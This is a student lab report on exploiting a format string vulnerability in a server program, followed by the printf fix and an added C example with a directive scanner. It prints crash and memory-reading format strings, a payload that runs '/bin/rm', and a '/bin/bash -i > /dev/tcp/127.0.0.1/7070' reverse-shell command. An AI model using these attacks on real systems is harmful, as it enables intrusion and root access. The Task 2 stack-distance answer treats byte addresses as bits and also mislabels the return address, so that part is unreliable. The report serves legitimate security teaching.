CPS633 Lab3 PDF

The document outlines a lab on format string vulnerabilities in a server program, detailing tasks that include identifying memory addresses, crashing the program, and injecting malicious code. It explains how to exploit the vulnerability to gain a reverse shell and provides a solution to fix the vulnerability by modifying the printf function. The lab emphasizes the importance of proper input formatting to prevent security issues.
CPS 633 Computer Security

Format String Vulnerability Lab


Lab 3
Justin Miraflor - 500908894 Section 3
Ryan Rodrigues - 500915227 Section 1
The DUMMY_SIZE value for this lab is: 150

2.1 Task 1: The Vulnerable Program


When compiling the server.c program, the following warning message appears as mentioned in
the lab:

When running the program under root privileges, we get the following output:

When sending a “hello” message to the server using the nc command, we get the following:

This study source was downloaded by 100000885095184 from CourseHero.com on 05-01-2025 17:59:39 GMT -05:00

https://www.coursehero.com/file/113545824/CPS633-Lab3pdf/
Sending the content of badfile to the server using the nc command:

2.2 Task 2: Understanding the Layout of the Stack


Question 1: What are the memory addresses at the locations marked by 1, 2 and 3?
1. Format string address = “target” variable after = 0x0804a044
2. Return address = ebp value = 0xbfd27ee8
3. buf[1500] = input array = 0xbfd27fc0
Question 2: What is the distance between the locations marked by 1 and 3?
Memory address of 1 is 0x0804a044 = 134,520,900
Memory address of 3 is 0xbfd27fc0 = 3,218,243,520 bits

3,218,243,520 - 134,520,900 = 3,083,722,620 bits


3,083,722,620 bits = 385,465,328 bytes of memory

385,465,328 bytes of memory is the distance between 1 and 3.

2.3 Task 3: Crash the Program


To crash the program, the input that we would need to type when running “server” would be
“%s%s%s%s%s%s%s%s”

2.4 Task 4: Print Out the Server Program’s Memory
Part A: Stack Data

The number of "%x" specifiers we needed to provide before the server program printed the
first four bytes of our input is 50.

Part B: Heap Data


Since the address of the secret message is 0x08048880, we can use it to read the content of
the secret message, which is the value "0000000000000096".

2.5 Task 5: Change the Server Program’s Memory


Part A: Change the value to a different value

2.6 Task 6: Inject Malicious Code into the Server Program


In order for the Python program to remove the target file, we would need to use the format string
vulnerability to modify the return address and feed the server program the memory address of
the malicious code (server_exploit_skeleton.py), so that the stack runs
/bin/bash -c "/bin/rm /tmp/myfile" in the server terminal. The format string is constructed by
including the memory address of the malicious code, so that when the function returns after the
call, it runs the malicious code.

2.7 Task 7: Getting a Reverse Shell
Within the Python code given (server_exploit_skeleton.py), the changes that were made are
shown below:
"x68""<&1 2>&1"
"x68""//7070 0"
"x68""///127.0.0.1"
"x68""/dev/tcp"
"x68"" -iii > "
"x68""/bin////bash"
In lines 1 and 2 of the code, we changed the values placed on the stack so that the server runs the
command "/bin/bash -i > /dev/tcp/127.0.0.1/7070 0<&1 2>&1". The format string in this task is
also constructed by finding the memory address of the code and sending it to the server
program. If the attack on this server is successful, we gain access to a root shell on the
victim's computer.

2.8 Task 8: Fixing the Problem


The warning message generated by the gcc compiler means that the compiler cannot
determine the arguments given to "printf" until run-time. In a way, the compiler is also telling us
that we should be more specific about what we want the function "printf" to accept, since
otherwise it may lead to problems when running the program.

To fix the vulnerability in the program, we switch the line of code "printf(msg);" to
"printf("%s", msg);". Now the program compiles without any warnings, because we have told the
compiler how the input string is to be formatted.

When trying the same attacks as before they no longer work:
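The fix above side by side with the vulnerable call, as an added example that is not the lab's server.c. The scan_format helper is our own addition: it counts the directives printf would act on in an attacker-controlled message, which explains why "%s%s%s%s%s%s%s%s" crashed the program in Task 3 while the "%s" fix prints the same message verbatim.

```c
#include <stdio.h>
#include <string.h>

/* Result of scanning a client message as if it were a printf format string. */
struct fmt_stats {
    int conversions;   /* total % directives; each one consumes a stack word  */
    int string_reads;  /* %s: pointer dereferences, the source of the crash   */
    int writes;        /* %n: memory writes, how Task 5 changed a variable    */
};

/* Count directives the way printf interprets them: "%%" is a literal
   percent sign; otherwise skip flags, width, precision and length
   modifiers and classify the final conversion character. */
struct fmt_stats scan_format(const char *msg) {
    struct fmt_stats st = {0, 0, 0};
    for (const char *p = msg; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                  /* escaped percent sign */
        while (*p && strchr("-+ #0123456789.*hlLqjzt", *p)) p++;
        if (!*p) break;                           /* dangling '%' at end */
        st.conversions++;
        if (*p == 's') st.string_reads++;
        if (*p == 'n') st.writes++;
    }
    return st;
}

/* Vulnerable form from the lab: the message itself is the format string.
   gcc reports this with -Wformat-security; the pragma silences it only so
   the "before" state compiles next to the "after" state. Never call this
   on untrusted input. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
void echo_vulnerable(const char *msg) {
    printf(msg);
}
#pragma GCC diagnostic pop

/* Fixed form: a constant format string, the message is only an argument. */
void echo_fixed(const char *msg) {
    printf("%s", msg);
}

/* The same fix applied to a buffer so the result can be checked: every
   '%' in msg is reproduced literally and nothing is read from the stack. */
int render_fixed(const char *msg, char *out, size_t cap) {
    return snprintf(out, cap, "%s", msg);
}
```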
